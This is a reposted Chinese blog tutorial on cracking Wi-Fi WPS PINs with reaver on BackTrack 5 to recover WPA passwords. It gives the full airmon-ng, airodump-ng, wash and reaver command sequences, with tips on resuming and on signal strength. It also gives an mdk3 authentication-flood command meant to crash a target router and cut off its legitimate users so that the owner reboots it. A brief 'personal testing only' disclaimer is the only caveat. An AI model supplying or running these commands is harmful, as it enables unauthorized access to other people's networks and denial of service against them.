精解reaver用BT5成功PIN解码

精解reaver用BT5成功PIN解码精解reaver用BT5成功PIN解码 (2012-09-2014:06:23)转载▼标签: reaver bt5 pin wireless linux分类: LinuxPIN码破密特点:1、不需要客户端2、有PIN码就能获得无线密码3、八位数PIN码实际只

大家好,又见面了,我是你们的朋友全栈君。

精解reaver用BT5成功PIN解码

 
(2012-09-20 14:06:23)

标签: 

reaver

 

bt5

 

pin

 

wireless

 

linux

分类: Linux
PIN码破密特点:

1、不需要客户端
2、有PIN码就能获得无线密码
3、八位数PIN码实际只有一万一千组随机密码
4、抓包、EWSA跑包,每个环节都有很大的不确定性,而PIN破密,只要开户WPS,破密只是个时间问题。



提醒:只限于个人测试使用,由于非法操作引起的相关法律责任与本作者无关。





reaver使用方法、步骤

1、打开超级终端 ROOt shell  


2、如果电脑装有多个无线网卡,请先发指令
3、
ifconfig -a

4、
确认你用哪一个网卡WLAN0或WLAN1



下面的指令都是以单一网卡
WLAN0为例

一、激活监听模式:

airmon-ng start wlan0

二、查看周边AP信息(抓包):
airodump-ng  mon0
wash -i mon0 -C

观察要破AP的PWR信号强弱变化,注意同频干扰,调整网卡放置位置和角度、方向。

PWR 小于 -75 基本上会Timeout, PWR-60左右,则非常顺畅(2-6秒攻击一次)

三、按Ctrl+C终止抓包

四、 抓PIN码:


reaver -i mon0 -b MAC  -vv


例如:
reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv -a -S -d 0 -t 1

1.4版可用:
reaver -i mon0 -b C8:3A:35:F6:BB:B8 -v 
  
(可用一个v)

注意,MAC中冒号不可省略,MAC地址的字母大小写均可, -vv是两个V不是W

 

 


特别提示:

只有AP开启了WPS、QSS功能,才可以用PIN法破PSK密码!

如何查看AP是否开了WPS、QSS呢?

一、使用指令:



airodump-ng  mon0




MB一栏下,出现  
54e. 看清楚有点“.”) 是开WPS的



AP关闭了WPS、或者没有QSS滴,会出现
WARNING: Failed to associate with XX:XX:XX:XX:XX:XX  (ESSID: XXXX)

PIN破密对信号要求极为严格,
如果信号稍差,可能导致破密进度变慢或者路由死锁等
(重复同一个PIN码 或 
timeout),特别是1、6默认频道中,有较多的AP,相互干扰,因此,确定网卡放置的最佳位置、方向、角度十分重要。


破解过程中 ,重复同一个PIN码 或 timeout 可随时随地按Ctrl+C终止reaver会自动保存进度。

重复第2-4项内容,先看看AP信号强弱或是否关机,

若继续破,则再次在终端中发送:

reaver -i mon0 -b MAC -vv




当reaver确定前4位PIN密码后,其工作完成任务进度数值将直接跳跃至90.9%以上,也就是说只剩余一千个密码组合了。总共一万一千个密码。




曙光就在前头,胜利往往在 再坚持一下的努力之中


如果,90.9%进程后死机或停机,请记下PIN前四位数,用指令:

reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)


会从指定PIN段起破密。


额外:(假如pin死了,就用命令强制让路由器重启)
首先检测网卡:

ifconfig -a

然后模拟端口:

airmon-ng start wlan0

接下来用:

airodump-ng mon0  
 //扫描ap找到你pin死的路由器mac

用mdk3 做身份验证攻击

mdk3 mon0 a -a mac(被pin死的路由器的mac)

身份验证攻击效果说明:

此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。

说明:

此命令功能强大,使用错误会造成所有ap不能使用,请指定mac地址,然后使用,其余命令不要乱试。你要使用此命令的其他参数,请详细阅读此命令参数详解。

此操作会让路由器完全宕机,不但无线不能用,有线的也连接不了,必须重启路由器!
请谨慎使用!

如果出现99.99%的一直pin的,但就是不出密码,这可能是漏码了,要重新pin,所以一开始pin的时候就再加一个参数。
reaver -i mon0 -b MAC -a -Svvn -d 0
加一个  -n  的参数这样就不会漏码了
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/143011.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • Java和Python的区别及工资对比,到底该学哪个?[通俗易懂]

    Java和Python的区别及工资对比,到底该学哪个?[通俗易懂]不知不觉,2019年的第三季度也快要结束了!随着互联网的发展,人工智能、语音技术、区块链等技术不断发挥着重要作用时,大家一直都在追逐着、猜测着2020年什么技术会火,却忽略掉了眼前的事情。近日有位博主做出了9月份关于程序员工资统计:·Java工程师工资·Python工程师工资自从Python火爆全球后,一直以来都被拿来和Java相比,从以上数据可以看出:Python薪资比Java会…

  • Java面试之Weblogic 及其它「建议收藏」

    Java面试之Weblogic 及其它「建议收藏」Java面试之Weblogic 及其它

  • 玫瑰花(C语言代码)

    玫瑰花(C语言代码)代码用到图形库,有音乐,音乐名为BadApple.mp3,可以找一首mp3形式的歌,歌名改成BadApple.mp3,与.exe文件放在同一个文件夹下,程序执行时会播放名字为BadApple.mp3音乐(会玩的可以去看程序自己改),不同编译器颜色不同左vc,右Dev,颜色也可以通过RGB()进行修改。加个图形库(EasyX)的链接(根据提示来就行):https://blog.csdn…

  • 面试题springboot启动流程_Spring boot面试

    面试题springboot启动流程_Spring boot面试SpringBoot启动原理1、什么是SpringBoot2、SpringBoot启动原理3、三个关键注解解析3.1、@SpringBootConfiguration注解解析1、什么是SpringBootSpringBoot是由Pivotal团队提供的全新框架,其设计目的是用来简化新Spring应用的初始搭建以及开发过程。该框架使用了特定的方式来进行配置,从而使开发人员不再需要定义样板化的配置。通过这种方式,SpringBoot致力于在蓬勃发展的快速应用开发领域(RapidApplication

  • java学生宿舍管理系统代码(java简单宿舍管理系统)

    分为三大类land.java(登陆界面)system.java(系统管理界面)sql.java(数据库操作,包括连接、断开、增删改查等操作)一、登陆界面及代码主要代码:登陆按钮事件publicvoidactionPerformed(ActionEvente){ //TODOAuto-generatedmethodstub if((JButton)e.ge…

  • Drupal开发学习入门指引[通俗易懂]

    Drupal开发学习入门指引[通俗易懂]我是云客,《云客drupal8源码分析》系列的作者,伴随着drupal8第一个正式版本发布到现在,该系列已经发布100期,超过60万字,作为中国投入精力最大、同时也是时间最早的第一批用户之一,云客觉得有义务帮助初学者准备好行囊,叮嘱好一路上的注意事项,之前也零星写过一些入门方面的资料,会在本文末给出链接(这些资料也很值得参考),本篇将为您全面整理需要的一切和规划学习步骤,这里假定您是一个刚刚学会p…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号